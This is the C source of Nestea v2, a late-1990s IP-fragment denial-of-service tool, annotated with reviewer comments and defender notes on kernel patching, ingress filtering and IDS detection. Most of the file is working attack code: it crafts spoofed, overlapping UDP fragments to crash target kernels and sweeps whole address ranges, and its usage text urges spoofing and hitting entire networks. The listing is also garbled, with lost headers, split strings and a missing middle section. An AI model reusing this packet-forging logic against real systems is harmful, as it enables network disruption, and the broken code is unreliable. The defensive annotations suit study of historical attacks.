/*
 * Nestea v2 -- a historical (1998-era) IP-fragment denial-of-service tool.
 *
 * NOTE(review): this listing is a collapsed/extracted copy.  Every
 * `#include` below has lost its header name, two string literals are split
 * across page line breaks, backslash-newline continuations inside string
 * literals survive only as "\ ", and the tail of send_frags() together with
 * the head of name_resolve() is missing (see the marked spot below).
 * Nothing missing has been reconstructed; the file as shown does not
 * compile.
 *
 * What the visible code does: it opens a raw IP socket with IP_HDRINCL and,
 * for every host in the last-octet range given on the command line, sends
 * `count` rounds of three hand-built UDP fragments that all carry IP id 242
 * but inconsistent header lengths, total lengths and fragment offsets.  The
 * author's own comment on COUNT says the intent is to corrupt a few bytes
 * in the target kernel during reassembly; the source address is expected to
 * be spoofed (see usage()).
 *
 * Defender notes: the tool appears to rely on reassembly code that does not
 * bound-check overlapping fragments, so the mitigation is a patched kernel.
 * Ingress filtering (BCP 38) at the network edge blocks the spoofed source.
 * On the wire the pattern is a repeating set of fragments sharing one IP id
 * whose declared lengths and offsets do not fit together -- exactly what a
 * fragment-reassembly preprocessor in an IDS is meant to flag.
 */

/* NOTE(review): header names were lost in extraction (the <...> part was
 * probably eaten as markup); the bare directives are left as found. */
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include

/* FIX() hides an old BSD quirk where ip_len/ip_off were expected in host
 * byte order by the raw-socket layer; on Linux the fields go out in network
 * order.  Which branch is compiled decides whether the length/offset fields
 * below are byte-swapped. */
#ifdef STRANGE_BSD_BYTE_ORDERING_THING /* OpenBSD < 2.1, all FreeBSD and netBSD, BSDi < 3.0 */
#define FIX(n) (n)
#else /* OpenBSD 2.1, all Linux */
#define FIX(n) htons(n)
#endif /* STRANGE_BSD_BYTE_ORDERING_THING */

#define IP_MF 0x2000 /* More IP fragment en route */
#define IPH 0x14 /* IP header size */
#define UDPH 0x8 /* UDP header size */
#define MAGIC2 108 /* payload length of the second (last, MF-clear) fragment */
#define PADDING 256 /* datagram frame padding for first packet */
#define COUNT 500 /* we are overwriting a small number of bytes we shouldnt have access to in the kernel. to be safe, we should hit them till they die : > */

/* Dotted-quad octets of the first and last target address, filled by
 * sscanf() in main().  Only an upper bound (<= 255) is checked there. */
struct ipstuph { int p1; int p2; int p3; int p4; } startip, endip;

void usage(u_char *);                       /* prints help and exit(0)s; `name` unused */
u_long name_resolve(u_char *);              /* text -> network-order address; body partly lost below */
u_short in_cksum(u_short *, int);           /* declared, but no definition appears in this listing */
void send_frags(int, u_long, u_long, u_short, u_short);

/*
 * Entry point.  argv[1] = source address to put in the IP header,
 * argv[2] = first target, argv[3] = last target (same first three octets);
 * options -s (source port), -t (destination port), -n (rounds per host),
 * -q (quiet).  Returns 0 after the sweep; every error path calls exit(1).
 */
int main(int argc, char **argv)
{
    int one = 1, count = 0, i, rip_sock, j, bequiet = 0;
    u_long src_ip = 0, dst_ip = 0;
    u_short src_prt = 0, dst_prt = 0;
    /* 18 bytes: room for "ddd.ddd.ddd.ddd" plus NUL and little else. */
    char hit_ip[18], dst_ip2[18];
    struct in_addr addr;

    fprintf(stderr, "\nNestea v2 originally by: humble + ttol mods\n");
    fprintf(stderr, "Color and Instructions was done by : ttol\n");
    /* NOTE(review): this literal is split by a page line break in the
     * extracted copy; left exactly as found. */
    fprintf(stderr, "Note : ttol released Nestea v2. humble had nothing to do with \n it, don't nag him about it. 
 -ttol@ttol.net\n\n");

    /* Raw socket with IP_HDRINCL: the process supplies the entire IP header,
     * which is what allows the forged source address and fragment fields.
     * Creating one requires elevated privilege, so an unprivileged user
     * cannot run this.  Note the socket is opened before the arguments are
     * even checked. */
    if((rip_sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) { perror("raw socket"); exit(1); }
    if (setsockopt(rip_sock, IPPROTO_IP, IP_HDRINCL, (char *)&one, sizeof(one)) < 0) { perror("IP_HDRINCL"); exit(1); }
    if (argc < 4) usage(argv[0]);
    /* name_resolve() returns 0 on failure (see its surviving tail below). */
    if (!(src_ip = name_resolve(argv[1])) || !(dst_ip = name_resolve(argv[2]))) { fprintf(stderr, "What the hell kind of IP address is that?\n"); exit(1); }
    /* Defect: unbounded copy of argv[3] into an 18-byte stack buffer that is
     * only ever used for the banner below; a longer argument overflows it. */
    strcpy(dst_ip2,argv[3]);
    /* The octet checks that follow test only "> 255"; negative octets pass
     * and are later formatted into hit_ip[18] by sprintf(). */
    if(sscanf(argv[2],"%d.%d.%d.%d",&startip.p1,&startip.p2,&startip.p3, &startip.p4) != 4) { fprintf(stderr, "Error, arg2(startip) : Need an ip that contains 4 zones\n"); exit(1); }
    /* NOTE(review): the "\ " inside the next few literals is a collapsed
     * backslash-newline continuation; left as found. */
    if (startip.p1 > 255) { fprintf(stderr, "Error : Zone 1 of start ip is incorrect \ (greater than 255)\n"); exit(1); }
    if (startip.p2 > 255) { fprintf(stderr, "Error : Zone 2 of start ip is incorrect \ (greater than 255)\n"); exit(1); }
    if (startip.p3 > 255) { fprintf(stderr, "Error : Zone 3 of start ip is incorrect \ (greater than 255)\n"); exit(1); }
    if (startip.p4 > 255) { fprintf(stderr, "Error : Zone 4 of start ip is incorret \ (greater than 255)\n"); exit(1); }
    /* The "[[0;34m" / "[[0m" below are ANSI colour sequences whose ESC byte
     * was lost in extraction. */
    if(sscanf(argv[3],"%d.%d.%d.%d",&endip.p1,&endip.p2,&endip.p3, &endip.p4) != 4) { fprintf(stderr, "Error, arg3(endip) : [[0;34mNeed an ip that \ contains 4 zones[[0m\n"); exit(1); }
    if (endip.p1 > 255) { fprintf(stderr, "Error : Zone 1 of end ip is incorrect \ (greater than 255)\n"); exit(1); }
    if (endip.p2 > 255) { fprintf(stderr, "Error : Zone 2 of end ip is incorrect \ (greater than 255)\n"); exit(1); }
    if (endip.p3 > 255) { fprintf(stderr, "Error : Zone 3 of end ip is incorrect (greater than 255)\n"); exit(1); }
    if (endip.p4 > 255) { fprintf(stderr, "Error : Zone 4 of end ip is incorrect (greater than 255)\n"); exit(1); }
    /* Only the last octet may vary: the sweep below iterates p4 alone. */
    if (startip.p1 != endip.p1) { fprintf(stderr, "Error : Zone 1 of start ip and end ip is different\n"); exit(1); }
    if (startip.p2 != endip.p2) { fprintf(stderr, "Error : Zone 2 of start ip and end ip is different\n"); exit(1); }
    if (startip.p3 != endip.p3) { fprintf(stderr, "Error : Zone 3 of start ip and end ip is different\n"); exit(1); }

    /* NOTE(review): getopt_long() normally takes five arguments (long-option
     * table and index); this three-argument call looks like a plain getopt()
     * call under another name -- confirm against the intended libc. */
    while ((i = getopt_long(argc, argv, "s:t:n:q")) != EOF) {
        switch (i) {
        case 's': /* source port (should be emphemeral) */
            src_prt = (u_short)atoi(optarg);
            break;
        case 't': /* dest port (DNS, anyone?) */
            dst_prt = (u_short)atoi(optarg);
            break;
        case 'n': /* number to send */
            count = atoi(optarg);
            break;
        case 'q': /* quiet mode */
            bequiet = 1;
            break;
        default :
            usage(argv[0]);
            break; /* NOTREACHED */
        }
    }

    /* Unspecified ports are drawn from a time-seeded PRNG (0..0xfffe);
     * count defaults to COUNT. */
    srandom((unsigned)(time((time_t)0)));
    if (!src_prt) src_prt = (random() % 0xffff);
    if (!dst_prt) dst_prt = (random() % 0xffff);
    if (!count) count = COUNT;

    fprintf(stderr, "Death on flaxen wings (yet again):\n");
    addr.s_addr = src_ip;
    fprintf(stderr, "From: %15s.%d\n", inet_ntoa(addr), src_prt);
    addr.s_addr = dst_ip;
    fprintf(stderr, " To: %15s - %s.%d\n", inet_ntoa(addr), dst_ip2, dst_prt);
    fprintf(stderr, " Amt: %5d\n", count);
    if (bequiet) fprintf(stderr, "[quiet mode] Each'.' represents a nuked ip. [");

    /* Sweep the last octet from startip.p4 to endip.p4 inclusive; for each
     * host send `count` rounds of fragments with a 500 us pause between
     * rounds. */
    for (j=startip.p4; j <= endip.p4; j++) {
        /* Fits hit_ip[18] only while all four octets are non-negative and
         * <= 255 (see the incomplete checks above). */
        sprintf(hit_ip,"%d.%d.%d.%d",startip.p1,startip.p2,startip.p3,j);
        if (!(bequiet)) fprintf(stderr, "%s [ ", hit_ip);
        if (!(dst_ip = name_resolve(hit_ip))) { fprintf(stderr, "What the hell kind of IP address is that?\n"); exit(1); }
        for (i = 0; i < count; i++) {
            send_frags(rip_sock, src_ip, dst_ip, src_prt, dst_prt);
            if (!(bequiet)) fprintf(stderr, "d00m ");
            usleep(500);
        }
        if (bequiet) fprintf(stderr, "."); else fprintf(stderr, "]\n");
    }
    if (bequiet) fprintf(stderr, "]\n");
    return (0);
}

/*
 * Builds and sends one round of three raw IP/UDP fragments to dst_ip.
 * All three carry IP id 242 and TTL 0x40 and leave the IP checksum to the
 * kernel (IP_HDRINCL).  They disagree about the datagram they belong to,
 * which is the detectable signature:
 *   1: 20-byte header, MF set,   offset 0,            total length 38  (UDP len 18)
 *   2: 20-byte header, MF clear, offset 6 (48 bytes), total length 136 (UDP len 116)
 *   3: 60-byte header (IHL 0xF), MF set, offset 0,    total length 324 (UDP len 264)
 *
 * Portability defect: u_long is 8 bytes on LP64 targets, so the two address
 * stores below write past their 4-byte fields; the code assumes a 32-bit
 * u_long.  malloc() is unchecked, and the buffer is freed only on the
 * sendto() error paths -- the function's tail is missing from this listing,
 * so whether the success path frees it cannot be seen here.
 */
void send_frags(int sock, u_long src_ip, u_long dst_ip, u_short src_prt, u_short dst_prt)
{
    int i;
    u_char *packet = NULL, *p_ptr = NULL; /* packet pointers */
    u_char byte; /* a byte */
    struct sockaddr_in sin; /* socket protocol structure */

    /* sin_port is stored without htons(); presumably irrelevant because an
     * IPPROTO_RAW sendto() only consults sin_addr -- confirm. */
    sin.sin_family = AF_INET;
    sin.sin_port = src_prt;
    sin.sin_addr.s_addr = dst_ip;

    /* One buffer sized for the largest (third) fragment is reused for all three. */
    packet = (u_char *)malloc(IPH + UDPH + PADDING+40);

    /* ---- fragment 1: MF set, offset 0, 10 bytes of UDP payload ---- */
    p_ptr = packet;
    bzero((u_char *)p_ptr, IPH + UDPH + PADDING);
    byte = 0x45; /* IP version and header length */
    memcpy(p_ptr, &byte, sizeof(u_char));
    p_ptr += 2; /* IP TOS (skipped) */
    *((u_short *)p_ptr) = FIX(IPH + UDPH + 10); /* total length */
    p_ptr += 2;
    *((u_short *)p_ptr) = htons(242); /* IP id */
    p_ptr += 2;
    /* The buffer was just zeroed, so |= is effectively an assignment here. */
    *((u_short *)p_ptr) |= FIX(IP_MF); /* IP frag flags and offset */
    p_ptr += 2;
    *((u_short *)p_ptr) = 0x40; /* IP TTL */
    byte = IPPROTO_UDP;
    memcpy(p_ptr + 1, &byte, sizeof(u_char));
    p_ptr += 4; /* IP checksum filled in by kernel */
    *((u_long *)p_ptr) = src_ip; /* IP source address */
    p_ptr += 4;
    *((u_long *)p_ptr) = dst_ip; /* IP destination address */
    p_ptr += 4;
    *((u_short *)p_ptr) = htons(src_prt); /* UDP source port */
    p_ptr += 2;
    *((u_short *)p_ptr) = htons(dst_prt); /* UDP destination port */
    p_ptr += 2;
    *((u_short *)p_ptr) = htons(8 + 10); /* UDP total length */
    if (sendto(sock, packet, IPH + UDPH + 10, 0, (struct sockaddr *)&sin, sizeof(struct sockaddr)) == -1) { perror("\nsendto"); free(packet); exit(1); }

    /* ---- fragment 2: MF clear (claims to be last), offset 6, MAGIC2 bytes ---- */
    p_ptr = packet;
    bzero((u_char *)p_ptr, IPH + UDPH + PADDING);
    byte = 0x45; /* IP version and header length */
    memcpy(p_ptr, &byte, sizeof(u_char));
    p_ptr += 2; /* IP TOS (skipped) */
    *((u_short *)p_ptr) = FIX(IPH + UDPH + MAGIC2); /* total length */
    p_ptr += 2;
    *((u_short *)p_ptr) = htons(242); /* IP id */
    p_ptr += 2;
    *((u_short *)p_ptr) = FIX(6); /* IP frag flags and offset */
    p_ptr += 2;
    *((u_short *)p_ptr) = 0x40; /* IP TTL */
    byte = IPPROTO_UDP;
    memcpy(p_ptr + 1, &byte, sizeof(u_char));
    p_ptr += 4; /* IP checksum filled in by kernel */
    *((u_long *)p_ptr) = src_ip; /* IP source address */
    p_ptr += 4;
    *((u_long *)p_ptr) = dst_ip; /* IP destination address */
    p_ptr += 4;
    *((u_short *)p_ptr) = htons(src_prt); /* UDP source port */
    p_ptr += 2;
    *((u_short *)p_ptr) = htons(dst_prt); /* UDP destination port */
    p_ptr += 2;
    *((u_short *)p_ptr) = htons(8 + MAGIC2); /* UDP total length */
    if (sendto(sock, packet, IPH + UDPH + MAGIC2, 0, (struct sockaddr *)&sin, sizeof(struct sockaddr)) == -1) { perror("\nsendto"); free(packet); exit(1); }

    /* ---- fragment 3: 60-byte IP header, MF set, offset 0, PADDING bytes ---- */
    p_ptr = packet;
    bzero((u_char *)p_ptr, IPH + UDPH + PADDING+40);
    /* 0x4F: version 4, IHL 15 (60-byte header) -- the extra 40 header bytes
     * are what the "+40" in the sizes and the "+= 44" below account for. */
    byte = 0x4F; /* IP version and header length */
    memcpy(p_ptr, &byte, sizeof(u_char));
    p_ptr += 2; /* IP TOS (skipped) */
    *((u_short *)p_ptr) = FIX(IPH + UDPH + PADDING+40); /* total length */
    p_ptr += 2;
    *((u_short *)p_ptr) = htons(242); /* IP id */
    p_ptr += 2;
    *((u_short *)p_ptr) = 0 | FIX(IP_MF); /* IP frag flags and offset */
    p_ptr += 2;
    *((u_short *)p_ptr) = 0x40; /* IP TTL */
    byte = IPPROTO_UDP;
    memcpy(p_ptr + 1, &byte, sizeof(u_char));
    p_ptr += 4; /* IP checksum filled in by kernel */
    *((u_long *)p_ptr) = src_ip; /* IP source address */
    p_ptr += 4;
    *((u_long *)p_ptr) = dst_ip; /* IP destination address */
    p_ptr += 44; /* skip 4 address bytes + 40 bytes of zeroed header options */
    *((u_short *)p_ptr) = htons(src_prt); /* UDP source port */
    p_ptr += 2;
    *((u_short *)p_ptr) = htons(dst_prt); /* UDP destination port */
    p_ptr += 2;
    *((u_short *)p_ptr) = htons(8 + PADDING); /* UDP total length */
    /* NOTE(review): extraction lost everything between this `for` header and
     * the memcpy() inside name_resolve(): the loop body, the rest of
     * send_frags() (including its third sendto() and any free()), and
     * name_resolve()'s signature and lookup.  The fragment is left exactly
     * as found and has not been reconstructed.  What survives shows
     * name_resolve() copying a gethostbyname()-style h_addr into
     * addr.s_addr and returning it (0 signals failure to main()). */
    for(i=0;ih_addr, (char *)&addr.s_addr, host_ent->h_length); }
    return (addr.s_addr);
}

/*
 * Prints the command-line help to stderr and exits with status 0.
 * `name` (argv[0]) is accepted but never used.
 */
void usage(u_char *name)
{
    fprintf(stderr, "nestea2 source startIP endIP [-s src port] [-t dest port] [-n quantity] [-q]\n");
    fprintf(stderr, "source : This is the source IP to nestea from, make it a spoof\n");
    fprintf(stderr, "startIP : From which IP should we start from? (eg 153.35.85.1)\n");
    /* NOTE(review): literal split by a page line break in the extracted
     * copy; left exactly as found. */
    fprintf(stderr, "endIP : From which IP should we end with? 
(eg 153.35.95.255)\n");
    fprintf(stderr, "src port : This is the source port to spoof from (OPTIONAL)\n");
    fprintf(stderr, "dest port: This is the destination port to nestea to (OPTIONAL)\n");
    fprintf(stderr, "quantity : This is how many times to nestea the victim (perfered is 1000)\n");
    fprintf(stderr, "-q : This is quiet mode so you don't see the d00m's\n\n");
    fprintf(stderr, "Example : nestea2 127.0.0.1 153.35.85.1 153.35.85.255 -n 1000\n");
    fprintf(stderr, "The above was to hit a whole Class C of 153.35.85 with the return \naddress from 127.0.0.1 doing it 1000 times\n");
    fprintf(stderr, "Example2 : nestea2 153.35.85.32 153.35.85.32 153.85.35.32 -n 1000\n");
    fprintf(stderr, "The above was to hit 153.35.85.32 with the source 153.35.85.32 \ndoing it 1000 times\n");
    fprintf(stderr, "I perfer example2, probably because it is the lazy man's way out\n\n");
    fprintf(stderr, " NOT TO BE DISTRIBUTED!\n");
    exit(0);
}
/* www.hack.co.za [2000]*/